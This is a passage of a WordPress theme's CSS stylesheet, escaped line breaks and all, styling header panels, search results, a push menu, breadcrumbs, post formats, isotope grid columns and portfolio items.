auto;\r\n\tleft:4em;\r\n}\r\n\r\n.top_panel_middle .sidebar_cart:after,\r\n.menu_user_nav > li > ul:after,\r\n.search_wrap .search_results:after {\r\n\tcontent:\" \";\r\n\twidth:10px;\r\n\theight:10px;\r\n\tbackground-color: #fff;\r\n\tborder-left: 1px solid #e5e5e5;\r\n\tborder-top: 1px solid #e5e5e5;\r\n\tposition: absolute;\r\n\ttop:-6px;\r\n\tright:3em;\r\n\t-webkit-transform: rotate(45deg);\r\n\t-moz-transform: rotate(45deg);\r\n\t-o-transform: rotate(45deg);\r\n\t-ms-transform: rotate(45deg);\r\n\ttransform: rotate(45deg);\r\n}\r\n.top_panel_middle .sidebar_cart:after,\r\n.menu_user_nav > li > ul:after {\r\n\tleft: 1.5em;\r\n\tright:auto;\r\n}\r\n.top_panel_style_5 .top_panel_middle .sidebar_cart:after,\r\n.top_panel_style_6 .top_panel_middle .sidebar_cart:after,\r\n.top_panel_style_7 .top_panel_middle .sidebar_cart:after,\r\n.top_panel_style_8 .top_panel_middle .sidebar_cart:after {\r\n\tright:2.15em;\r\n\tleft:auto;\r\n}\r\n.menu_user_nav > li > ul > li {\r\n\tz-index:1;\r\n}\r\n.search_wrap .search_results .search_results_close {\r\n\tposition: absolute;\r\n\ttop:3px;\r\n\tright:3px;\r\n\tdisplay:block;\r\n\ttext-align:center;\r\n\toverflow:hidden;\r\n\tfont-size:0.875em;\r\n\twidth:1.2em;\r\n\theight:1.2em;\r\n\tline-height:1.2em;\r\n\tcursor:pointer;\r\n}\r\n.search_wrap .post_more {\r\n\tdisplay:block;\r\n\ttext-align:center;\r\n}\r\n.widget_area .post_item {\r\n\toverflow:hidden;\r\n}\r\n.widget_area aside .post_item + .post_item,\r\n.search_results.widget_area .post_item + .post_item {\r\n\tmargin-top:10px;\r\n\tpadding-top:1em;\r\n}\r\n.search_results.widget_area .post_item + .post_item {\r\n\tborder-top:1px solid #e5e5e5;\r\n}\r\n.widget_area .post_item .post_content {\r\n\toverflow:hidden;\r\n}\r\n.widget_area .post_item .post_thumb {\r\n\tfloat:left;\r\n\twidth: 4.2em;\r\n\theight: 3.8em;\r\n\tmargin:0 1.25em 4px 0;\r\n\toverflow:hidden;\r\n}\r\n.widget_area .post_item .post_thumb img {\r\n\twidth:100%;\r\n}\r\n.widget_area .post_item .post_title {\r\n\tmargin: -2px 0 6px 0;\r\n\tfont-size: 0.874em;\r\n\theight: 4.5em;\r\n}\r\n\r\n.widget_top10 .post_item .post_title,\r\n.widget_recent_reviews .post_item .post_title{\r\n\theight: 2.3em;\r\n}\r\n\r\n.widget_area .post_item .post_info {\r\n\tfont-size:0.75em;\r\n\tmargin-bottom:0;\r\n\tline-height:1.5em;\r\n}\r\n\r\n/* Search field inside content */\r\n.content .search_wrap {\r\n\tmargin:0;\r\n\tmax-width: 55%;\r\n}\r\n.content .columns_wrap .search_wrap {\r\n\tmax-width:100%;\r\n}\r\n.content .search_wrap .search_form_wrap {\r\n\twidth: 100%;\r\n}\r\n.content .search_wrap .search_form_wrap .search_field {\r\n\twidth:70%;\r\n\tpadding: 0.47em 1em;\r\n}\r\n.content .search_wrap.search_fixed .search_form_wrap .search_field {\r\n\twidth: 96%;\r\n}\r\n.content .search_wrap .search_results {\r\n\twidth:100%;\r\n}\r\n\r\n/* Header 8 - dropdown menu */\r\n.top_panel_style_8 .content_wrap {\r\n\twidth:100%;\r\n\tpadding: 0 3.8462em;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.top_panel_style_8 .top_panel_middle {\r\n\tposition:relative;\r\n}\r\n.top_panel_style_8 .top_panel_middle .menu_pushy_wrap {\r\n\tmargin:0;\r\n\ttext-align:left;\r\n\tfloat:left;\r\n}\r\n.top_panel_style_8 .contact_logo {\r\n\tdisplay:inline-block;\r\n\tposition:absolute;\r\n\tz-index:1;\r\n\tleft: 50%;\r\n\ttop:50%;\r\n\t-webkit-transform:translateX(-50%) translateY(-50%);\r\n\t-moz-transform:translateX(-50%) translateY(-50%);\r\n\ttransform:translateX(-50%) translateY(-50%);\r\n}\r\n.top_panel_style_8 .top_panel_middle .logo {\r\n\tmargin:0.5em 0 0 0;\r\n}\r\n.top_panel_style_8 .menu_pushy_button {\r\n\tdisplay: inline-block;\r\n}\r\n.top_panel_style_8 .menu_pushy_button:before {\r\n\tfont-size: 1.4em;\r\n\tline-height:1.2em;\r\n\tvertical-align:top;\r\n}\r\n.top_panel_style_8 .top_panel_buttons {\r\n\tfloat:right;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_cart_button:before,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_cart_button:after {\r\n\tcontent:' ';\r\n\tdisplay:block;\r\n\tfont-size:0.75em;\r\n\tposition:absolute;\r\n\tz-index:1;\r\n\tright: 0;\r\n\ttop:-1px;\r\n\twidth: 1em;\r\n\theight: 1em;\r\n\tline-height: 1em;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_cart_button:before {\r\n\tbackground-color:red;\r\n\t-webkit-transform:rotate(45deg);\r\n\t-moz-transform:rotate(45deg);\r\n\ttransform:rotate(45deg);\r\n\tright: 2px;\r\n\ttop:-2px;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_cart_button:after {\r\n\tcontent: attr(data-items);\r\n\tfont-size:0.65em;\r\n\tfont-weight:700;\r\n}\r\n.top_panel_inner_style_8 .top_panel_buttons,\r\n.top_panel_inner_style_8 .menu_pushy_button {\r\n\tmargin:0;\r\n\tpadding-top:1.8em;\r\n\tpadding-bottom:1.8em;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon {\r\n\tmargin:0;\r\n\tfloat:right;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon.search_wrap {\r\n\theight:1.5em;\r\n\tline-height:1.5em;\r\n\tmargin-left:1em;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .contact_icon,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon .search_submit {\r\n\twidth:1.5em;\r\n\theight:1.5em;\r\n\tline-height:1.5em;\r\n\t-webkit-border-radius: 0;\r\n\t-moz-border-radius: 0;\r\n\tborder-radius: 0;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon .search_field {\r\n\tpadding:2px;\r\n\tvertical-align:top;\r\n}\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon.menu_main_cart .contact_icon,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon.search_wrap,\r\n.top_panel_style_8 .top_panel_buttons a:hover,\r\n.top_panel_style_8 .top_panel_middle .top_panel_buttons a:hover .contact_icon,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon.search_wrap:hover,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon:hover .contact_icon,\r\n.top_panel_style_8 .top_panel_buttons .top_panel_icon:hover .search_submit {\r\n\tbackground-color:transparent;\r\n}\r\n\r\n/* Push panel */\r\n.site-overlay {\r\n\tdisplay: none;\r\n\tposition: fixed;\r\n\ttop: 0;\r\n\tbottom: 0;\r\n\tleft: 0;\r\n\tright: 0;\r\n\theight: 110%;\r\n\tz-index: 9998;\r\n\tbackground-color: rgba(0,0,0,0.5);\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n}\r\n.pushy {\r\n\tposition: fixed;\r\n\twidth: 25em;\r\n\tbottom: 0;\r\n\ttop: 0;\r\n\tleft: -25em;\r\n\tz-index: 10000;\r\n\toverflow: hidden;\r\n\ttext-align: center;\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n}\r\n.pushy-active .pushy {\r\n\tleft: 0;\r\n}\r\n.pushy .pushy_inner {\r\n\twidth:105%;\r\n\theight: 100%;\r\n\tpadding: 3em 0 1em 0;\r\n\tposition:relative;\r\n\toverflow: scroll;\r\n\t-webkit-overflow-scrolling: touch; /* enables momentum scrolling in iOS overflow elements */\r\n}\r\n.pushy .close-pushy:before {\r\n\tcontent: '\\e8ac';\r\n\tfont-family: fontello;\r\n\tfont-size: 1.5em;\r\n\tposition:absolute;\r\n\tright: 1.25em;\r\n\ttop: 2em;\r\n\tz-index: 999;\r\n}\r\n.pushy .logo_fixed {\r\n\tdisplay: none;\r\n}\r\n.pushy .logo {\r\n\tmargin: 2em 0;\r\n}\r\n\r\n.menu_pushy_nav_area .menu_pushy_nav {\r\n\tmargin-bottom:2em;\r\n}\r\n.menu_pushy_nav_area ul,\r\n.menu_pushy_nav_area li {\r\n\tmargin:0;\r\n\tpadding:0;\r\n\tlist-style:none;\r\n}\r\n.menu_pushy_nav_area li > a {\r\n\tposition:relative;\r\n\tdisplay:block;\r\n\tpadding:0.5em 3em;\r\n}\r\n.menu_pushy_nav_area li.menu-item-has-children ul {\r\n\tdisplay:none;\r\n}\r\n.menu_pushy_nav_area li.menu-item-has-children > a:after {\r\n\tcontent: '\\e828';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tright:2em;\r\n\ttop:50%;\r\n\t-webkit-transform: translateY(-50%);\r\n\t-moz-transform: translateY(-50%);\r\n\ttransform: translateY(-50%);\r\n}\r\n.menu_pushy_nav_area li.menu-item-has-children.opened > a:after {\r\n\tcontent: '\\e835';\r\n}\r\n\r\n\r\n\r\n/* 7.2 Main Slider\r\n-------------------------------------------------------------- */\r\n.slider_wrap .rev_slider_wrapper {\r\n\tz-index:0;\r\n}\r\n.tparrows.default {\r\n\t/* \tdisplay: none; */\t/* Remove this row if you want display slides navigation arrows */\r\n\tbackground:none; \r\n\tbackground-color:transparent; \r\n\tline-height:40px; \r\n}\r\n.tparrows.default:before { \r\n\tfont-family: \"fontello\"; \r\n\tfont-size:3em; \r\n}\r\n.tp-leftarrow.default:before { \r\n\tcontent: '\\e837'; \r\n}\r\n.tp-rightarrow.default:before { \r\n\tcontent: '\\e836'; \r\n}\r\n.tp-bullets.simplebullets.round .bullet {\r\n\tbackground:none;\r\n\tmargin-left:16px;\r\n\tborder:1px solid transparent;\r\n\twidth: 10px;\r\n\theight: 10px;\r\n\t-webkit-border-radius: 50%;\r\n\t-moz-border-radius: 50%;\r\n\tborder-radius: 50%;\r\n}\r\n.tp-bullets.simplebullets.round .bullet.selected {\r\n\tbackground-color:transparent !important;\r\n\tborder-width:1px;\r\n\tborder-style: solid;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n/* 7.3 Page info: page title and breadcrumbs\r\n-------------------------------------------------------------- */\r\n.top_panel_title.title_present.breadcrumbs_present .page_title,\r\n.top_panel_title.title_present.breadcrumbs_present .breadcrumbs {\r\n\tmax-width:49%;\r\n}\r\n.top_panel_style_3 .page_title,\r\n.top_panel_style_3 .breadcrumbs {\r\n\tfloat:none !important;\r\n\tmax-width:100% !important;\r\n\ttext-align:center;\r\n}\r\n\r\n.top_panel_title_inner {\r\n\toverflow:hidden;\r\n}\r\n.top_panel_title .page_title {\r\n\tfloat:left;\r\n\tmargin:0;\r\n\tfont-weight:500;\r\n\tfont-size: 1.375em;\r\n\tpadding: 1.12em 0;\t\r\n\tline-height:1.2em;\r\n}\r\n.top_panel_style_3 .page_title {\r\n\tpadding:0.5em 0 0.25em;\r\n}\r\n\r\n.top_panel_title .breadcrumbs {\r\n\tfloat:right;\r\n\tpadding: 1.9em 0;\r\n\tfont-size:0.813em;\r\n\tline-height:1.5em;\r\n\tfont-weight: 600\r\n}\r\n\r\n.breadcrumbs .breadcrumbs_item {\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\twhite-space:nowrap; \r\n}\r\n\r\n.breadcrumbs .breadcrumbs_delimiter {\r\n\tdisplay:inline-block;\r\n\tposition:relative;\r\n\tmargin:0 0.6em;\r\n\tvertical-align:top;\r\n\ttext-align:center;\r\n}\r\n.breadcrumbs .breadcrumbs_delimiter:before {\r\n\tcontent:'\\e8f3';\r\n\tfont-family: 'fontello';\r\n}\r\n\r\n\r\n\r\n/* 7.4 Main content wrapper\r\n-------------------------------------------------------------- */\r\n\r\n/* Post featured block */\r\n.post_featured {\r\n\toverflow:hidden;\r\n\tposition:relative;\r\n\tmargin-bottom:1.5em;\r\n}\r\n.post_featured img {\r\n\twidth:100%;\r\n\theight:auto;\r\n}\r\n\r\n.post_featured_right > .post_featured {\r\n\tfloat: right;\r\n\twidth: 50%;\r\n\tmargin-left: 4.3478%;\r\n}\r\n.post_featured_left > .post_featured {\r\n\tfloat: left;\r\n\twidth: 50%;\r\n\tmargin-right: 4.3478%;\r\n}\r\n\r\n\r\n/* Post info block */\r\n.post_info_bottom {\r\n\tmargin-bottom:3em;\r\n}\r\n.post_info .post_info_item+.post_info_item:before {\r\n\tdisplay: inline-block;\r\n\tcontent:\"|\";\r\n\tvertical-align:top;\r\n\tfont-style:normal;\r\n\tmargin: 0 0.5em;\r\n\tfont-size: 1.2em;\r\n\tline-height: 1.5em;\r\n\tfont-weight: 100;\r\n}\r\n\r\n.isotope_item  .post_info .post_info_item+.post_info_item:before{\r\n\tmargin: 0 0.1em;\r\n\tcontent: '';\r\n}\r\n\r\n.post_info .post_info_counters .post_counters_item {\r\n\tdisplay:inline-block;\r\n\tmargin-right:0.75em;\r\n}\r\n.post_info .post_info_counters .post_counters_item:before {\r\n\tmargin-right:0.5em;\r\n}\r\n.post_info.post_info_share_vertical {\r\n\tmargin:0;\r\n}\r\n.post_info .post_info_counters .post_counters_likes.disabled {\r\n\tcolor:#e05100;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n/* 7.5 Post Formats\r\n-------------------------------------------------------------- */\r\n\r\n/* Quote */\r\nblockquote {\r\n\tpadding: 2.55em 2em 2.5em 6em;\r\n\twidth: 88%;\r\n\tmargin-left: 12%;\r\n\tbox-sizing: border-box;\r\n\tborder-radius:  5px;\r\n\t-webkit-border-radius:  5px;\r\n\t-moz-border-radius:  5px;\r\n}\r\n\r\nblockquote p{\r\n\tfont-size: 1.375em;\r\n}\r\n\r\nblockquote, blockquote p {\r\n\tposition:relative;\r\n\tz-index:2;\r\n\tfont-weight:500;\r\n\tline-height: 1.55em;\r\n}\r\n\r\nblockquote p.sc_quote_title{\r\n\tfont-size: 1em;\r\n\tfont-weight: 600;\r\n\tmargin-top: 1.1em;\r\n}\r\n\r\nblockquote:before {\r\n\tfont-family:'fontello';\r\n\tcontent: '\\e8b6';\r\n\tdisplay:block;\r\n\tposition:absolute;\r\n\tz-index:1;\r\n\tleft: 0.7em;\r\n\ttop: 0.1em;\r\n\tfont-size: 5.5em;\r\n\ttransform: rotate(180deg);\r\n\t-moz-transform: rotate(180deg);\r\n\t-webkit-transform: rotate(180deg);\r\n\tline-height:1em;\r\n\tcolor: rgba(128,128,128,0.1);\r\n}\r\nblockquote p {\r\n\tmargin: 0;\r\n}\r\nblockquote p + p {\r\n\tmargin-top: 0.3em;\r\n}\r\nblockquote > a,\r\nblockquote > p > a,\r\nblockquote cite {\r\n\tdisplay:block;\r\n\tfont-size: 0.6667em;\r\n\tfont-weight:normal;\r\n\tmargin-top:1em;\r\n}\r\n\r\nblockquote.sc_quote.style-2{\r\n\tpadding: 0em 4em 0em 2.3em;\r\n\tborder-left: 2px solid;\r\n\tborder-radius:  0px;\r\n\t-webkit-border-radius:  0px;\r\n\t-moz-border-radius:  0px;\r\n}\r\n\r\nblockquote.sc_quote.style-2:before{\r\n\tcontent: none;\r\n}\r\n\r\n\r\n/* Link */\r\n.post_format_link .post_descr a {\r\n\tfont-size: 1.875em;\r\n}\r\n\r\n\r\n/* Status */\r\n.post_format_status.post_item_single .post_content p,\r\n.post_format_status .post_descr {\r\n\tfont-size: 1.875em;\r\n\tline-height:1.3333em;\r\n}\r\n\r\n/* Aside */\r\n.post_format_aside.post_item_single .post_content p,\r\n.post_format_aside .post_descr {\r\n\tborder-width: 1px;\r\n\tborder-style: solid;\r\n\tpadding: 2em 2.5em;\r\n\t\tborder-radius:  5px;\r\n\t-webkit-border-radius:  5px;\r\n\t-moz-border-radius:  5px;\r\n}\r\n\r\n.post_format_aside .post_descr p {\r\n\tmargin-bottom:0;\r\n}\r\n.post_format_aside .post_descr p+p {\r\n\tmargin-top:1em;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n/* 7.6 Post Layouts\r\n-------------------------------------------------------------- */\r\n\r\n.post_item .post_descr {\r\n\tline-height:1.5em;\r\n}\r\n.post_item .post_readmore:after {\r\n\tcontent: '\\e836';\r\n\tfont-family:fontello;\r\n\tdisplay: inline-block;\r\n\tmargin-left:0.5em;\r\n}\r\n\r\n/* Layout Excerpt */\r\n.post_title .post_icon {\r\n\tfont-size:0.9375em;\r\n\tmargin-right:0.5em;\r\n}\r\n.post_item_excerpt .post_title .post_icon {\r\n\tdisplay:block;\r\n\tmargin-right:0;\r\n}\r\n.post_item_excerpt .post_title {\r\n\tmargin-top:0;\r\n\tmargin-bottom:0.65em;\r\n\tfont-size: 3.1em;\r\n\tfont-weight: 300;\r\n}\r\n.post_item_excerpt:not([class*=\"column\"]) + .post_item_excerpt:not([class*=\"column\"]) {\r\n\tmargin-top:3em;\r\n}\r\n.post_item_excerpt .post_content {\r\n\tmargin-bottom:5em;\r\n}\r\n\r\n\r\n/* Related posts */\r\n.related_wrap {\r\n\tmargin-bottom:3em;\r\n}\r\n.related_wrap.related_wrap_empty {\r\n\tmargin-bottom:0;\r\n}\r\n.related_wrap .section_title {\r\n\tmargin:1em 0 1em;\r\n}\r\n.article_style_stretch:not(.sidebar_show) .related_wrap:not(.related_wrap_empty) {\r\n\tbackground-color: #f4f7f9;\r\n\tpadding: 1px 2.1875em 4em;\r\n}\r\n.article_style_stretch .related_wrap:not(.related_wrap_empty):not(.scroll_wrap) {\r\n\tpadding-bottom: 1px;\r\n}\r\n.related_wrap .post_item_related,\r\n.article_style_stretch .post_item_related {\r\n\tbackground-color:#ffffff;\r\n}\r\n.article_style_boxed.sidebar_show[class*=\"single-\"] .related_wrap .post_item_related {\r\n\tbackground-color: #f4f7f9;\r\n}\r\n.related_wrap.scroll_wrap .post_item_related {\r\n\twidth:350px;\r\n\tfloat:left;\r\n}\r\n.related_wrap.scroll_wrap .post_item_related+.post_item_related {\r\n\tmargin-left:3.125em;\r\n}\r\n.article_style_stretch:not(.body_style_fullscreen):not(.sidebar_hide) .related_wrap.scroll_wrap  .post_item_related {\r\n\twidth:340px;\r\n}\r\n.article_style_stretch:not(.body_style_fullscreen):not(.sidebar_hide) .related_wrap.scroll_wrap  .post_item_related+.post_item_related {\r\n\tmargin-left:1.875em;\r\n}\r\n.post_item_related .post_featured {\r\n\twidth:100%;\r\n\t/*height:56.25%;*/\r\n\toverflow:hidden;\r\n\tmargin:0;\r\n\tfloat:none !important;\r\n}\r\n.post_item_related .post_featured .hover_icon:before {\r\n\tfont-size:3em;\r\n}\r\n.post_item_related .post_featured .sc_audio.sc_audio_image {\r\n\tmin-height:14.8571em;\r\n}\r\n.post_item_related .post_content_wrap {\r\n\twidth:100%;\r\n\theight:6.4em;\r\n\toverflow:hidden;\r\n\tpadding: 1em 1.25em;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.post_item_related .post_title {\r\n\tmargin: 0 0 0.25em;\r\n}\r\n\r\n/* Masonry and Portfolio */\r\n.post_item_classic .post_title {\r\n\tmax-height: 1.2em;\r\n\toverflow: hidden;\r\n\ttext-align: center;\r\n\tfont-size: 1.563em;\r\n\tfont-weight: 500;\r\n\tmargin-bottom: 0;\r\n}\r\n.post_item_short .post_title {\r\n\tmax-height: 2em;\r\n\toverflow: hidden;\r\n}\r\n.post_item_grid .post_descr {\r\n\tmax-height: 8em;\r\n\toverflow: hidden;\r\n}\r\n\r\n/* Isotope layout */\r\n.isotope_wrap {\r\n\tmargin-right:-30px;\r\n}\r\n.isotope_wrap .isotope_item {\r\n\tpadding-right:30px;\r\n\tpadding-bottom:30px;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n}\r\n.sc_blogger.no_margins .isotope_wrap,\r\n.isotope_wrap.no_margins {\r\n\tmargin-right:0;\r\n}\r\n.sc_blogger.no_margins .isotope_wrap .isotope_item,\r\n.isotope_wrap.no_margins .isotope_item {\r\n\tpadding-right:0;\r\n\tpadding-bottom:0;\r\n}\r\n.sc_blogger.small_margins .isotope_wrap,\r\n.isotope_wrap.small_margins {\r\n\tmargin-right:-10px;\r\n}\r\n.sc_blogger.small_margins .isotope_wrap .isotope_item,\r\n.isotope_wrap.small_margins .isotope_item {\r\n\tpadding-right:10px;\r\n\tpadding-bottom:10px;\r\n}\r\n.isotope_wrap .isotope_item.isotope_item_show {\r\n\topacity: 1;\r\n\tfilter: alpha(opacity=100);\r\n}\r\n.isotope_wrap .isotope_column_2 {\twidth:50%;}\r\n.isotope_wrap .isotope_column_2[class*=\"isotope_item_size-2\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_3 {\twidth:33.3333%;}\r\n.isotope_wrap .isotope_column_3[class*=\"isotope_item_size-2\"] {\twidth:66.6666%;}\r\n.isotope_wrap .isotope_column_3[class*=\"isotope_item_size-3\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_4 {\twidth:25%;}\r\n.isotope_wrap .isotope_column_4[class*=\"isotope_item_size-2\"] {\twidth:50%;}\r\n.isotope_wrap .isotope_column_4[class*=\"isotope_item_size-3\"] {\twidth:75%;}\r\n.isotope_wrap .isotope_column_4[class*=\"isotope_item_size-4\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_5 {\twidth:20%;}\r\n.isotope_wrap .isotope_column_5[class*=\"isotope_item_size-2\"] {\twidth:40%;}\r\n.isotope_wrap .isotope_column_5[class*=\"isotope_item_size-3\"] {\twidth:60%;}\r\n.isotope_wrap .isotope_column_5[class*=\"isotope_item_size-4\"] {\twidth:80%;}\r\n.isotope_wrap .isotope_column_5[class*=\"isotope_item_size-5\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_6 {\twidth:16.6666%;}\r\n.isotope_wrap .isotope_column_6[class*=\"isotope_item_size-2\"] {\twidth:33.3333%;}\r\n.isotope_wrap .isotope_column_6[class*=\"isotope_item_size-3\"] {\twidth:50%;}\r\n.isotope_wrap .isotope_column_6[class*=\"isotope_item_size-4\"] {\twidth:66.6666%;}\r\n.isotope_wrap .isotope_column_6[class*=\"isotope_item_size-5\"] {\twidth:83.3333%;}\r\n.isotope_wrap .isotope_column_6[class*=\"isotope_item_size-6\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_7 {\twidth:14.2857%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-2\"] {\twidth:28.5714%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-3\"] {\twidth:42.8571%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-4\"] {\twidth:57.1428%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-5\"] {\twidth:71.4285%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-6\"] {\twidth:85.7128%;}\r\n.isotope_wrap .isotope_column_7[class*=\"isotope_item_size-7\"] {\twidth:100%;}\r\n.isotope_wrap .isotope_column_8 {\twidth:12.5%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-2\"] {\twidth:25%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-3\"] {\twidth:37.5%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-4\"] {\twidth:50%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-5\"] {\twidth:62.5%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-6\"] {\twidth:75%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-7\"] {\twidth:87.5%;}\r\n.isotope_wrap .isotope_column_8[class*=\"isotope_item_size-8\"] {\twidth:100%;}\r\n\r\n/* Isotope item decoration */\r\n.isotope_wrap .isotope_item .post_item {\r\n\toverflow:hidden;\r\n}\r\n.isotope_wrap .isotope_item .post_featured .hover_icon:before {\r\n\tfont-size:3em;\r\n}\r\n.isotope_wrap .isotope_item .post_featured {\r\n\tmargin-bottom:0;\r\n}\r\n.article_style_boxed .isotope_wrap .isotope_item .post_title {\r\n\tmargin-top:0;\r\n}\r\n.article_style_boxed .isotope_wrap .isotope_item .post_content {\r\n\tpadding:1.25em 1.8em;\r\n}\r\n.article_style_boxed.template_portfolio .isotope_wrap .isotope_item .post_content,\r\n.article_style_boxed .template_portfolio .isotope_wrap .isotope_item .post_content {\r\n\tpadding:0;\r\n}\r\n.isotope_wrap .isotope_item p,\r\n.isotope_wrap .isotope_item .post_info {\r\n\tmargin-bottom: 1.7em;\r\n\tmargin-top: 2.4em;\r\n\ttext-align: center;\r\n}\r\n\r\n\r\n\r\n.isotope_wrap .isotope_item .post_info .post_info_posted:before{\r\n\tfont-family: 'fontello';\r\n\tcontent: '\\e902';\r\n\tpadding-right: 4px;\r\n\tfont-size: 16px;\r\n\tfont-weight: 400;\r\n}\r\n\r\n/* Portfolio items */\r\n.isotope_wrap .isotope_item_colored .post_item,\r\n.isotope_wrap .isotope_item_grid .post_item,\r\n.isotope_wrap .isotope_item_square .post_item,\r\n.isotope_wrap .isotope_item_portfolio .post_item {\r\n\toverflow:visible;\r\n}\r\n.isotope_wrap .isotope_item_colored .post_featured,\r\n.isotope_wrap .isotope_item_portfolio .post_featured,\r\n.isotope_wrap .isotope_item_square .post_featured,\r\n.isotope_wrap .isotope_item_grid .post_featured {\r\n\tborder-bottom: none;\r\n}\r\n.isotope_wrap .isotope_item_colored .post_item .hover_icon,\r\n.isotope_wrap .isotope_item_grid .post_item .hover_icon,\r\n.isotope_wrap .isotope_item_square .post_item .hover_icon,\r\n.isotope_wrap .isotope_item_portfolio .post_item .hover_icon {\r\n\tposition:relative;\r\n\ttop: 0;\r\n\topacity:1;\r\n}\r\n.isotope_wrap .isotope_item_colored .post_item .hover_icon:before,\r\n.isotope_wrap .isotope_item_grid .post_item .hover_icon:before,\r\n.isotope_wrap .isotope_item_square .post_item .hover_icon:before,\r\n.isotope_wrap .isotope_item_portfolio .post_item .hover_icon:before {\r\n\tposition:static;\r\n\tmargin-top:0.3em;\r\n\topacity:1;\r\n\tfont-size:2.5em;\r\n\t-webkit-box-shadow: none;\r\n\t-moz-box-shadow: none;\r\n\tbox-shadow: none;\r\n\t-webkit-transform: translateX(0) translateY(0);\r\n\t-moz-transform: translateX(0) translateY(0);\r\n\ttransform: translateX(0) translateY(0);\r\n}\r\n\r\n\r\n/* Isotope filters */\r\n.isotope_filters {\r\n\toverflow:hidden;\r\n\ttext-align:center;\r\n\tmargin: 0 0 1em;\r\n\tpadding-bottom:0.5em;\r\n}\r\n.sidebar_hide .isotope_filters {\r\n\tmargin: 1em 0 1.5em;\r\n}\r\n.isotope_filters a {\r\n\tdisplay:inline-block;\r\n\tmargin: 0 4px 4px 0;\r\n\ttext-align:center;\r\n\tpadding:0.75em 1.5em;\r\n\tfont-size:0.75em;\r\n\tline-height: 1.2857em;\r\n\tfont-weight:400;\r\n\tborder-width:2px;\r\n\tborder-style: solid;\r\n}\r\n\r\n/* Isotope transitions */\r\n.isotope-hidden.isotope_item {\r\n\tpointer-events: none; \r\n\tz-index: 1;\r\n}\r\n\r\n\r\n/* Style \"Colored\" */\r\n.isotope_item_colored .post_featured .post_mark_new {\r\n\t-webkit-box-shadow: -3px 2px 0px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -3px 2px 0px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -3px 2px 0px 0px rgba(0, 0, 0, 0.2);\t\r\n}\r\n.post_item_colored .post_featured .post_mark_new {\r\n\tposition:absolute;\r\n\tleft:0;\r\n\ttop:0;\r\n\tmargin:1.6em 0 0 1.6em;\r\n\twidth:4em;\r\n\theight:4em;\r\n\toverflow:hidden;\r\n\tfont-size:0.625em;\r\n\tfont-weight:bold;\r\n\ttext-align:center;\r\n\tline-height:4em;\r\n\t-webkit-border-radius: 50%;\r\n\t-moz-border-radius: 50%;\r\n\tborder-radius: 50%;\r\n}\r\n.post_item_colored .post_featured .post_title,\r\n.post_item_colored .post_featured .post_descr {\r\n\tposition:absolute;\r\n\tleft: 0;\r\n\tright: 0;\r\n\tbottom:0;\r\n\theight:20%;\r\n\tpadding: 10px 16px;\r\n\toverflow:hidden;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.post_item_colored .post_featured .post_title {\r\n\tbottom:20%;\r\n\tmargin:0;\r\n\tline-height:1.15em;\r\n}\r\n.post_item_colored_4 .post_featured .post_title {\r\n\tfont-size: 1.125em;\r\n\tline-height:1.15em;\r\n\tpadding: 0.5em 0.6667em;\r\n}\r\n.post_item_colored .post_category {\r\n\tfont-size: 1.125em;\r\n\tfont-weight:400;\r\n\tline-height:1.15em;\r\n\tmargin: 0.25em 0 0.5em 0;\r\n}\r\n.post_item_colored .post_descr .post_price {\r\n\tfloat:right;\r\n\tmargin-top:1.5em;\r\n}\r\n.post_item_colored_4 .post_descr .post_price {\r\n\tmargin-top:0.875em;\r\n}\r\n.post_item_colored .post_descr .post_price_value {\r\n\tcolor: #222222;\r\n\tfont-size: 